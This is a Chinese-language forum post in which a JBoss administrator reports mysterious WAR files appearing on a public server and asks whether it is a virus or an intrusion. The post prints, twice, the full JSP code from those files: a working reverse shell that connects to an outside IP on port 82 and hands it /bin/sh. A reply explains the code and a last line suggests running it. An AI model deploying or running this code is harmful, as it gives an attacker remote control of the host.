我有一台jboss服务器,放在公网上,整个机房有防火墙等。近期突然发现jboss的deploy下不定时出现不明war包,名称都是类似于eAjFvtqD.war,gnJzyXUp.war,OinXcQQS.war的,内容就一个jsp文件,内容如下:<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os; StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
} public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
try
{
Socket socket = new Socket( "46.38.56.241", 82 );
Process process = Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>请大牛帮我看看,这是中了病毒,还是被人家黑了?jboss的控制台密码我都已经加了啊
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os; StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
} public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
try
{
Socket socket = new Socket( "46.38.56.241", 82 );
Process process = Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>请大牛帮我看看,这是中了病毒,还是被人家黑了?jboss的控制台密码我都已经加了啊
看这段程序,就是在你的服务器上执行/bin/sh,然后把执行结果发送到46.38.56.241的82端口上。
执行下看看啥效果